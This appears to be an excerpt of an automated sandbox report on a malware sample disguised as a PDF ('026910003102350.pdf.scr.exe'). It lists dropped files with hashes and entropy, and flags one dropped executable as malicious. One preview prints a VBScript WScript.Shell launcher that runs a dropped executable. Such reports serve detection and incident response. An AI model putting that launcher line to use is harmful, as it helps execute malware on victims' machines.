          SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
          Malicious:false
          Reputation:unknown
          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          File Type:ASCII text, with CRLF line terminators
          Category:modified
          Size (bytes):142
          Entropy (8bit):5.090621108356562
          Encrypted:false
          SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
          MD5:8C0458BB9EA02D50565175E38D577E35
          SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
          SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
          SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
          Malicious:false
          Reputation:unknown
          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
          Process:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):143
          Entropy (8bit):4.963345814111803
          Encrypted:false
          SSDEEP:3:FER/n0eFH5OUkh4E2J5xAIzbgFCdSfNUkh4E2J5xAIzbgbi1A:FER/lFHI923fzbgFeSfN923fzbgb7
          MD5:C3DAE34C95AFBA3A4E22F956B6761EF7
          SHA1:8DD9C50F51E1D8FA7492922AE3E05C8526824D88
          SHA-256:60DFA2FD6C51979E9A3E669F487471408474A5ABB43FFFF5536160401FB0712F
          SHA-512:987681FF2FC61676FE4FDFCBB748740BED5FC64AE9C7087D4D2EB0F492891ABDCBCD34CE2ADBBD50CCB390E098D867C0CE8B1CB4A10C7DD26AB6F1CFF58C821E
          Malicious:false
          Reputation:unknown
          Preview:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls"
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):597
          Entropy (8bit):6.186253247413455
          Encrypted:false
          SSDEEP:12:oXEXUz6MlWRGKb57dGZ47amIGP115oCnWRi8UVEpmyvLSoK/:OEXU+71dGG7apGRoYWRizVimyJg
          MD5:9D23B8A8A8DC43EC163438D3E58CDB4E
          SHA1:083823FFA163D66242EC8E04AD9C9A02A3F5F32E
          SHA-256:D249EC95400898681404C2D824E77651C8D8ACFFEBE92F51BC6D337DF11DB895
          SHA-512:ABA25C811AC517981F7F68F803B205E326B89F390E4E4208FE0CA51312EA15F403468C88EBC3C64EDCF8447E377012FCBA100D0BCB04A3BC861FCE041B7EE6D6
          Malicious:false
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):503
          Entropy (8bit):6.217480782110286
          Encrypted:false
          SSDEEP:12:BRE/nyLFn4WfUw7LT6aZXxGOAl54d3JcfZCMJL+VUftgAeryz/:n0YdRlFZwvlUJcfZL+VVqr
          MD5:2732EEA4B454A9C18455717D791AA346
          SHA1:6E3F73A1A0ADEA9FDBAE17F9E0208D6AD08B05EC
          SHA-256:64E99289977F284CE1C930F9E27A813C60C4F379E3E38F845E4EF11703ADE375
          SHA-512:69ADE759606DAF638525F6DACBAD04CD8CCCF724F2D1768CA5B3F16545F937D62B28DA738510BA78FBA83A7190DFAF80A1E19914A027DAFDBFDDEAD655F67FCC
          Malicious:false
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):528
          Entropy (8bit):6.181783102675102
          Encrypted:false
          SSDEEP:12:AjJFkEaE4BuYCDwUEY7Yn6eb0yVIHmMY7EC0LuHvZ2ItWDNEpKnFg0T:AjJDZ4BSDwURYn6eb0yVIlIvMqEFv
          MD5:B999711E1C647771E59A27D40F75E908
          SHA1:E1DBE34813EF6241B4B227042649805372321794
          SHA-256:6A9A2E454761426D0B07209E1958C520D008D8EFAABB12CFAFE777C15B0FA562
          SHA-512:7A5783199BB73E284E56A3D4D26268DABC6D1973562D91D4253D3EDA9EBD483F89F9D2545146CDE4935FAFF70F981B5B617CDA7B3A25E769C0C9E44BFCE6B876
          Malicious:false
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:ASCII text, with very long lines (65536), with no line terminators
          Category:dropped
          Size (bytes):407473
          Entropy (8bit):4.048588207938584
          Encrypted:false
          SSDEEP:3072:/JGA8gDqUGMl95jTDOWmA72KRvgr00mvlIRHqsEZipg7O65J48al5plklct4wyNu:h5VGMBJRvgr09nZiq7OIy8az0a4DuP
          MD5:48F9952AAAFE4CA15D39581E78889AC0
          SHA1:569F6FB010FEFB412192A968784DB355B8311853
          SHA-256:7F322D3E2096AA1F60CBF945595F155314D434A4FDD5A35640DF9363570FE666
          SHA-512:BAE18549694F7D75F24D057F21380C30CA6F9C7579EE3D4EAD2F4CAFF92E541797ABFA970688170501DE1EA378B5F0CAF071B46BD7C28030D6C15EFBA5296B87
          Malicious:false
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):62820
          Entropy (8bit):6.7478449446190245
          Encrypted:false
          SSDEEP:768:EaauGtmxdbAYaauGtmxdbAXaauGtmxdbAbaauGtmxdbAXaauGtmxdbA9aauGtmxt:NqJ5qJOqJ6qJOqJYqJ7qJrqJ/qJ5
          MD5:F96269E1056B12E82772B66B0884F8A6
          SHA1:C4D4F2D680A1A95B3FE3462A0F2CF80DC5DD8B05
          SHA-256:2A8C2D73D15B644CFCB109F61099B5501C706CD539D885C3929E35F636A886B8
          SHA-512:4A38D9B82454101EC0BAFE7EA472BCDC457724377F6B4277B7BBBEAE362B402C9012B17F0613B46817F5BF80355E005A01A57A6FE85E6EDF7AB90BF654572596
          Malicious:false
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):539
          Entropy (8bit):6.237962640598812
          Encrypted:false
          SSDEEP:12:6Dap/0JWG75MfHN4BgfCct6W/9TM3GoUDAPt4RV:6aEWD7dkI96GNDAPt4RV
          MD5:E96279C4B834A0D1348BA98595380443
          SHA1:B6857B68DE2711C498632D7FAE63702F800B29A0
          SHA-256:E9BC070312838661A856486A6D4433C46AB42AD7C18FA0D0D56943838B44F125
          SHA-512:F267F094F2F39B2225238FB02EB1CB99EB176D6F9DC380F75CF59439D0DF6229DD5F3987377BB23D3424C92288DE86D835605CA0EA0162B4EEB2441259119A71
          Malicious:false
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):514
          Entropy (8bit):6.218187584585582
          Encrypted:false
          SSDEEP:12:B/ZQ2hmQ7kCAxtYCU2QXbx0VgIrrkUC7GDAIh7mJbHz+t:B58DbLexFIV4GD3tmpSt
          MD5:06FEEDE36DB05B3D230E3081419A19A2
          SHA1:2D69F4B7F32BB925AA0CE16208F36BF5FE052F19
          SHA-256:76C4B7C04D21D13CA2B8344485033B11A3631C04F9F3F0EF55C466A443EBBEAD
          SHA-512:770031C2511B3A3E41CC0C0906927D5878B797A8FC5CDE7E33D725AC46934DA573F5D19C13C53C11BB1C626FED611ED2F87A377890863DD06F25ABDCA540B5A6
          Malicious:false
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):744
          Entropy (8bit):6.252068466825267
          Encrypted:false
          SSDEEP:12:pMzbyFRPpIHRufJX36MPoeyUTPg1vOlZvapSJYzD7xsgvj3IOeEwvnbkSkAQFQov:mzbyFHieJH6rtlmzapSJ47xX7DA/mJ9v
          MD5:5068F342795DD0ABC182D3E210DEA3DC
          SHA1:D19EF854A23175FB29C2E4477DD9FEBAACD7F113
          SHA-256:1938E80FD584E5F0AEA8FB71CEC826411B8E69F8541EAE8C820315462A9053B3
          SHA-512:BECF5BF96FBEF2F4809E62DF6DC7B3640ACBE2AE76CADA9E912BE9ABFE02F394C694D864318699B6AFF1CAE3A7B597A1929F7AB5C4D630127DEB7A0F7F070600
          Malicious:false
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):698
          Entropy (8bit):6.258683715544326
          Encrypted:false
          SSDEEP:12:VD+CEZtzDSITZIvJD7zmPAa0U5O6sr2mXd6GhVYNTx9+LiKyjfftWBdd:ArfScIvJ3SPP5O6s8GhsT3+LyLtsd
          MD5:DBC9AC22BDEEB8CD96BBAECD453652C1
          SHA1:089BD73581553744ADBA703B7254B0238C8C3E30
          SHA-256:1F9293BE18FEB28F2FB505E0C14660FD0CE8930A5FB8644EB908F187643C9C07
          SHA-512:BFD581BDE6C31E4F67EC5A1302F4B80756979A468B2C13DF24B67041D31B8D4DB9006598DACEF5B299D0A6DC1E809EF6AE7A99176E313E756DF89C0013EEE574
          Malicious:false
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):624
          Entropy (8bit):6.242263123832009
          Encrypted:false
          SSDEEP:12:ZgDtdbmShRjjA6D1IDDjUzIDZMo1S5Rn21D5akY/B15v:eDtdiSvjbGUUDZH1S5BUlcjx
          MD5:C516FA4A75BF057057BE211416395C0F
          SHA1:04E8F9798E788912ED41BEC8BBB0DF98662D5271
          SHA-256:D897EE20C42EE8D2DC2E1950F12FB254C62931DBC840D971FF26E45967045771
          SHA-512:69D91E298BC4619AEBADDEBFACAFA49BE66C1182F28CC91D83E98702B4E3213458A0A83B9DA15AB5B521EAFEA3CE07983A0185BB7A3B867BDB310E4713D78594
          Malicious:false
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):523
          Entropy (8bit):6.198216479466076
          Encrypted:false
          SSDEEP:12:15QbzLiR3mkusiHTHvYHC5qMXzyOWPz/wZdOyGhKPw/PcherOa:LQW3mQkAi5qOGyCEmchED
          MD5:DCC586BBC725E3FFB47CADEE31309C8E
          SHA1:D3630384B5A6D579453AB671607F8E51AE9C8CDA
          SHA-256:6B9C0567140D3565DD3B1D56C6B18E424DD6C1E0AE2F3DB521F234B9F108EE16
          SHA-512:05A5CA6133D7558B3F95278C01084540CEDE28BE9B34DB1AF0D4DA14EC8615EBA57D4A46CA272D94A95052CC471077421D6B3ED01DC879FA6E2FB34726DE92A2
          Malicious:false
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):936754
          Entropy (8bit):6.601305917045285
          Encrypted:false
          SSDEEP:24576:cYgAon+KfqNbXD2XJ2PH1ddATgs/u2karPK:c37+KSbq5e1diEnHam
          MD5:8A57722EC9067FAAA9FF2980C5F02838
          SHA1:F528308591C99004567DD76123E6D241ECDB5817
          SHA-256:3097D4413844FA305E10FB19DA3086848F2F3715B5B877E2F8691997BC25CD25
          SHA-512:27DFCA42250C1A0959023E9EB586CFE69BDA8166E5DE7C775370C30620D0E5E3515EBB85CC75AD57E7DBD65AE1612DD29CFD520B12BE64CD5C6EAE677A06A5AC
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 46%
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):537
          Entropy (8bit):6.2210381148806615
          Encrypted:false
          SSDEEP:12:cMSRrTZ3kkt6JJy9Lidiius2n4Hoboa5hPb1K9rL3XMd+Y1:cMSRrV3T/xiT64uoOjgtL3XM84
          MD5:DECFF247A10D1AB7F53AA5D798ECA2F7
          SHA1:E5DB2B53CB14488EC5EDD81D7CDE5FA53A11E837
          SHA-256:AC3428221792D658F6690BAB568201DB966D220EBB29E3426877941810DA4A96
          SHA-512:34272C48FFDA25F4C05CF0DF5FFA56D7B99EF09E4A2C2468739BA03C93D4EF171A1CE56E33C0E3CAD791E67E5079F6B5BCAD5E683B74FD615E60CF34CC02B0CD
          Malicious:false
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):506
          Entropy (8bit):6.2100184686076965
          Encrypted:false
          SSDEEP:12:04/uII8/4p0YqXRhMeXVfbpc6HumsDS1cAuzj:5GD8/4p0YARaexp7umoSI
          MD5:0F4EF68A2745715CF4B89D383968D0EB
          SHA1:50D039BF131F5F11EC21E7EEBF7E22B81937C0A5
          SHA-256:173AA7C8B7671410C3F73767A1DFE2711403B3F045DBF9825BDB115BF13B2D8F
          SHA-512:2DC45A2B0BA4E58486B6BF128D7C91B00B732A1A2BBBB4CC90369E70DF7A654350FC2854E99B0DEA9B53ADDF2EE68BB97AB4F278247A4F3C486F43710950A226
          Malicious:false
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):524
          Entropy (8bit):6.220072157041624
          Encrypted:false
          SSDEEP:12:IB7l5Fye8aehibvAui24ti7a/7skAywESg:IxcFb8obh3skA/Et
          MD5:DDAA651BD0ED9660CE485161F3DA0A31
          SHA1:F209147B7A434D9FF63997C57634694DD51E70C5
          SHA-256:6688EA36289339B7E8ABC74401F8338F14C7B824BEA4C56ACDEAE1082228B693
          SHA-512:966681795DF387F155F8D27D61AA4917E30F4A49E28B375700FBBBCA2F02AB45E5970891327795A0892B7466B412CEC537177D125251D983AA53A460176BBE05
          Malicious:false
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):515
          Entropy (8bit):6.204575666587385
          Encrypted:false
          SSDEEP:12:4r0qRbHsWBKiUtlBQ9+6t5pAaFJukpJ5Hx+pWpZe30ANx:4rRHsWUiIobppz3pR+pWve30A3
          MD5:C43B0D8E855F60BC8988C239AE91430E
          SHA1:38A9CC908239A6174A8C6CDD07DF2E65ED03C557
          SHA-256:F63FD422159E07439272BB6B603C3EB696C785AED53DBB0C693F9A9343869B89
          SHA-512:A7889E83FDA300933D47A34FA927EC0059BDFB518707DF227C157A82320A6E28189B8F88803DF45CE1C0FE6080E89FE034D84F8F1F7E0D044C4FCDE181AB59DE
          Malicious:false
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):664
          Entropy (8bit):6.212535146320597
          Encrypted:false
          SSDEEP:12:uuIc8nn8GGMe+xg0IKcrRR6Th9dZ73G/jaPCOtQwPGtMRZAV1uav:uuIc8V0+xgFvzm9dF3G/GVpY1t
          MD5:165255E5120FD4986C2B288F9FCAB09F
          SHA1:8CB0C248BB9A4BA714EA6739C74C1DE960BC7343
          SHA-256:CD7EC8254B748B3FE738147E27DF2FD3F7643D02835A46B15E93ECD060D06581
          SHA-512:AF748CC3EE4BA6747ABA50BE8AE6D568B7E913BBB33678C2E1116B4AA9AB14F7AB5860922223E62B3E6D9D3F72D81AE773D73EF3FE0CC0BA4069261E45280C26
          Malicious:false
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):36396
          Entropy (8bit):5.572411470115854
          Encrypted:false
          SSDEEP:768:JF/d5vD40//MnSKd5+GcpEl51vx6q91kB6S9nxIBAIU9Fd9jVvAyAg3thc:HPLQdYpElIqHkB6SsBDylaLg9hc
          MD5:3016649ED3E9A031DA118886A15144F7
          SHA1:58913D264B171A708F3AB825B14C096E47112677
          SHA-256:429880966442E56D685B62933A30BB780092C5B664C7E546AEA2B3CAB49945CE
          SHA-512:6C8EFD796609CDE371A5FA01B579742CF877CC1C604B933C09F52FB01D501C16E84AB1ADAD121B43C65D1EB88FBA6F1528E832D51E8AF7360EC120EDB9E0D5EB
          Malicious:false
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):739
          Entropy (8bit):6.2201318566424275
          Encrypted:false
          SSDEEP:12:jg/w0bWJnCzp5tnSA/hVmT6beGfLZKUTyD+wh5z6Wcg7ycQuzV7TWu2xD:juwbnap5siiT6vZD6jz6WMcQAi
          MD5:5B2FFEFEDF016705B02E548D343BD273
          SHA1:71C0005C0BB5259D7A8DF04607DB55E1DC48CFDF
          SHA-256:AE355FD9415586E5D427089E8E8E279A6F1BAAAC4CE24A9FA2039F0B9598BAD8
          SHA-512:BF6146C8C199501B43B2ADBED4A87E812B2E1A00C7E6D24FC2DFA81B47C5B1A85A3E7B189209EE571B33F57DDAA52159C77D91B621AB25EF87DC6E4F2670DB50
          Malicious:false
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):625
          Entropy (8bit):6.227007206665302
          Encrypted:false
          SSDEEP:12:/bBc8DsAO60OpRKP5WQBpnOjhF0BCynUZEz6i5eQbGcb5x6MniiIAa:D9zpRMbEjhOBT0EjeQtX6Miea
          MD5:EA84F04FF07EFE4DD573DF81C8D73112
          SHA1:56C7C452FDF7EC05DF7EEED80019520B4636636E
          SHA-256:51948EA1E1786F3639B5688CF099946AFEEC48A6DB2B4151E2340CDA19113607
          SHA-512:58EC762815FBB2D3A15FA06610B19017BC7B30D8868E968B93F5478908BEBA2B72551D784A8630835E7F9D50C047FA64452F4B212F4B6430D554A710FC8B9C22
          Malicious:false
          Reputation:unknown
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):523
          Entropy (8bit):6.2469950217286945
          Encrypted:false
          SSDEEP:12:MREuUZDYGXGpGzsyc8eo4jCEicYevV344JQ8LbHpQFPKs:E5G2Jyc8UCNsI4JQuJQFCs
          MD5:2E80CBC3177C60A2048EFD086D26DB0C
          SHA1:60011CEE58CDCE00026D09516C147445A399265C
          SHA-256:ADB88228E475C736251FD3A11BC7FB41F536FC8F0B80EA7C977153C054AB48FB
          SHA-512:A8DD351B67BEC96AA68512833DD76FF7B02757ACFF82758C93CA4F3D22F98436399FAB1D9E50D9E25C66993A35DE7649207278C49E80B4D0F3683AA3914F32EA
          Malicious:false
          Reputation:unknown
          Preview:.....................................................................................................................................................................................
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):540
          Entropy (8bit):6.191048141141158
          Encrypted:false
          SSDEEP:12:7OguD7Nc+8a2rZvnUqyLbSWfhCSl7EF07V4OEnz9T6eJpsjchWZPODQm9y:7Zui+8a2rVVyLbRISl95DEnz9+en9gqy
          MD5:BD2C67C8D59FE4FA46C2BD40B65F2014
          SHA1:303E8754D55A90565DC43581367644F3CF7F3A7A
          SHA-256:3AC63CC62CAEB2B9CA24141616FA10AEF0C64EA6721AB16B8B3E33878B09098D
          SHA-512:40A0D3D8C56F68908B273B532825E9F79BE73DFBBC02CBF0CDC72E4572CADF7837D36F5C75CB1BFDF2D87B39FC0EDE366D45AEEB0B37A80FD8A0968F24259117
          Malicious:false
          Reputation:unknown
          Preview:...........................................................................................................................................................................................
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):620
          Entropy (8bit):6.216440012089495
          Encrypted:false
          SSDEEP:12:KmsJX62KCMdStvQy6ws9M7odswOngZIl7tSghIbCFDbfCEvM4cW1PYDAePA4o:K1562KKIXws9ywOBlsghbf9M4cwZ
          MD5:B4D931185A25EC221C09C2E0C7DE0409
          SHA1:3580DF306627E9BE85243FDDE91165A24279273A
          SHA-256:508D3E6C83EF0A34BEBB22F6EE99B11A7214CED3E0748D1D4C751ACA8CCA7C71
          SHA-512:48E022E2ABCF790F95E1198523262EBBAE541C428A090E0D715F502CDBEDFD880B1EAC69AB5528A9055D845D9B722F30D08F0D0FEC2F1616F28403BDFDB6239F
          Malicious:false
          Reputation:unknown
          Preview:......................................................................................................................................................................................................................
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):109765414
          Entropy (8bit):7.149822507862373
          Encrypted:false
          SSDEEP:786432:jeiFTzFm2V+Ws11rx9irns45XQ0bWPu1EOi6h7ReyeLCD5oAD4Fk/YhswDvybX7+:E
          MD5:1A4F87FE68FAF07769D93372246F7315
          SHA1:756DBF9A1C5C60FA13B3285DF696C370C117A9AD
          SHA-256:AE5869183348BB70CDF4745B2629425B3DC5B9A96A9DCDE7862AC9F0BC97E346
          SHA-512:6C67055DB74FEEEFB9C03B2EA25DEB0680ACE4A9421AC0C458EA7AE4EC17CE24D093F47F7C43AA6553071994AADDCCA0BFF348B751AE7EBCCA6400009C097B2F
          Malicious:false
          Reputation:unknown
          Preview:..;....+L.,.I...4m.U7~.'...ka6k.,H'.I..(cr..?.e...A.{\.D.~.(S{..V.-..&X{...Cq.P..(Jj.saac.....#.c.s....,7..3..U..?..6.4>\...av.8...&...R.D.....L.u.-ej.%.B....E..6.R..39.Ei..`.......@.T...nB....w.D.....(Z..HZln....7......o=...qi.."....w.tw..m....p.Q.C.8.3.1.....Q.k.9.2.0.e.h.4.Y.o.6.n.G.2.x.Z.G.U.t.j.T.2.2.d.X.2.7.....4.3.U.4.7.7.....P.. ...|.b....xrMI.g...$....1..]]f..}..^C.I..sir`)Kcwj..H........V.DH.&.1n.N....C)..9.d....z:t...ed.....":.......H..s.zTc!A..p.[...;..D.A..A:...............c.C.E.7.7.1.5.s.P.J.6.F.1.7.4.4.M.W.O.c.3.1.0.y.6.1.0.8.0.6.0.e.1.1.e.D.0.z.3.Z.....B...u...#`...$.k......|...n....}:.....?.c..!..c..m...lm ...u.....w...g.{C.2*......s....o..{.......".(.RLD..G$.....xi*.h..@a.#.c...y...Hr.,.s..J(.....$..{...O.H.7VQ...p,....sA..X..........<d.)qI.1E..{...........Y.9.l.....t.=.P......2.B.5.3.1.e.X.7.z.4.4.I.z.P.z.7.........0^i.......7..~..@..V..W.n...%....H...?..Z.i..[.(d3........7.3.5.5.0.5.8.8.4.9.w.9.2.U.8.8.7.6.D.p.r.1.0.0.3.w.D.a.4.I.P.3.
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):515
          Entropy (8bit):6.204797250067207
          Encrypted:false
          SSDEEP:12:kXIjadX52agNuuF0Qc4fR1a7EUOAH4MKITBawUQTHl:ktX5xgNuNxURobwMKIlZF
          MD5:62058854A3A0211391D23AFE642D51C5
          SHA1:4333B74DCE3F8564D4156F2D11B66069EE3372F2
          SHA-256:D8E824CBC1D0F179F3733A2B5508200335A6EC646226F0B023E9FB4F94EA6CDE
          SHA-512:FC32610AFF79A33A8BF60624F36AFB4F705C22CFF0FD04C764DA1785EBCE3C69B2DEC865D43D73EC8A9A8F1296836AF73D94681CA1E589EB6423D453D921ABD2
          Malicious:false
          Reputation:unknown
          Preview:.................................................................................................................................................................................
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):550
          Entropy (8bit):6.251960168682925
          Encrypted:false
          SSDEEP:12:/yLLQ8dGYT/PD4jifw5AFTdBvnOh8LEUvXbkM/:KLLPdp/PDeUw5ArBvOh+7kc
          MD5:9F994AFD9BB142AB8A36D4C58F102F93
          SHA1:8DCB457E7F5EC4BB6B7E32305DD26A4F8D2A681E
          SHA-256:BD5CD1567D60D85D393A1DDCA22A737C89C1B3A3E5A7F8A772BFDE48B8CEA3B6
          SHA-512:BFA1BF3B846EFFFA96A48E91AE6A73E014F74D3459870979EB1117723D88928F8A183723AE5A5A2DA80301F3AFC6B50870E447252D1944664887C375E735ED13
          Malicious:false
          Reputation:unknown
          Preview:................K........[......................................................................................................................................................................
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):568
          Entropy (8bit):6.181793571320447
          Encrypted:false
          SSDEEP:12:4SJXAaJc93zJwGBv1ofBoOzwyc6it/ShtmACzggy+DjyJ:JQaJm39wi8DzRddMAC7PyJ
          MD5:7D0D7010210F47BBC571277006C8C174
          SHA1:73ED48688E61A32FC3A92E1099C411825FF5E59A
          SHA-256:814C2970E6246BF86415067D9780E8E2F1DD9EAF947C6BC425A815E749A08042
          SHA-512:CC91B14EC49EB15FD9F140C30D5321A42417C1F4C6C81222746A7A616AF83B9FEE4FCF4F8CAEE203688A08C6D1C6D3B74E4D9F6AEB4B1B50F3813F57387A0434
          Malicious:false
          Reputation:unknown
          Preview:....................................................................................................................................................................................................
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):659
          Entropy (8bit):6.246268360923076
          Encrypted:false
          SSDEEP:12:RUGtgFsr3B1AMOed5A3CEm5s6K6l5/FuMOkJ7vzu5hgrr/YoBVw1G+uD:CGtVr3B83C7s6NPuPVhg3zw1Gf
          MD5:166AD43D9C2CA35E2F55412A6ED8B515
          SHA1:5A5E8831BABF7E9FC4233417AA04046D45FFFC57
          SHA-256:4CB41D553941E698BD92DD077AE3CCE0E4ECA9DCCA9EAF2C3EA76C48C3A9A26E
          SHA-512:135E04042383237D766F1FB3CEC42C9E9400C71C34A8F0D7B46CBBD594189DD186507DA05E5DB8E71121FA57E7A74E6B38FACB424038CC65D993BE1EAF8D91DB
          Malicious:false
          Reputation:unknown
          Preview:...................................................................................................................................................................................................................................
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):603
          Entropy (8bit):6.243174528289961
          Encrypted:false
          SSDEEP:12:brw87rpvWqPZNtLlQN1MxCRQqw5ShuQYL2ptJ7BTmhFKAPN6bjEr2JM02Wb6rRn:brw87VeuzfQN1sCRQqCOUMtXUk1jhxGt
          MD5:02C0FBC15743BE076F645E223C92ACCB
          SHA1:76DB0F874C4462B5DED61D9104FCEC0E3C95D273
          SHA-256:C74821B50B9A993F24F4BB8788FF69A77A96C4A19DE69711564C26103D6D3F68
          SHA-512:E6CE845F43A37429DA29690951780958EFD7F95CA1AAE1D2D9F8146B93419C8DDFF0750A8F29127E3B89482890075964843C3D17C5FDC08704CD6E6079CE4DAC
          Malicious:false
          Reputation:unknown
          Preview:..............T....'............................................................................................................................................................................................
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):555
          Entropy (8bit):6.222922480311702
          Encrypted:false
          SSDEEP:12:BRudpgMXWpbVanAogLyE9387xsqwp7kxG8f5bUxjl:BkDWpbVanAo9EB8V/wpgA8f5bUJl
          MD5:CE86D4806786B5285DC23D378067A353
          SHA1:0D61DE00AC334DCBDA6B3E320E880DFADB2482C3
          SHA-256:24FD150DC97AC04C8D9AA8F482A994788D5B77578B16B6028B9980249FC724A8
          SHA-512:6ADE617608EB8453DEB3E43FBA45A1F3B39D6D7C78809CE9504676ECAD7CDE8F1B59BFC79C561E9687AE13FF5F359EBFE3C4DD198207298BEA25E530D412DEC3
          Malicious:false
          Reputation:unknown
          Preview:........................................................................................................................................................F..................>...................
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):612
          Entropy (8bit):6.20969596633477
          Encrypted:false
          SSDEEP:12:ZRlLCc8+8GvDRpsxyyNPPHO8VJG1tK3vtueUUtCn2I1sa0Jxun:Z6cftWyypPuB8wiCtF0Jxun
          MD5:55F53F4F242C0DB1E519E3E72DEED805
          SHA1:E9B4CC8F1401B641B5ACA044BF0379C1C2D653F4
          SHA-256:8E858683D645E559E93B7F3C2AD65E847A2EAAADF434190AC8278DDE580BA874
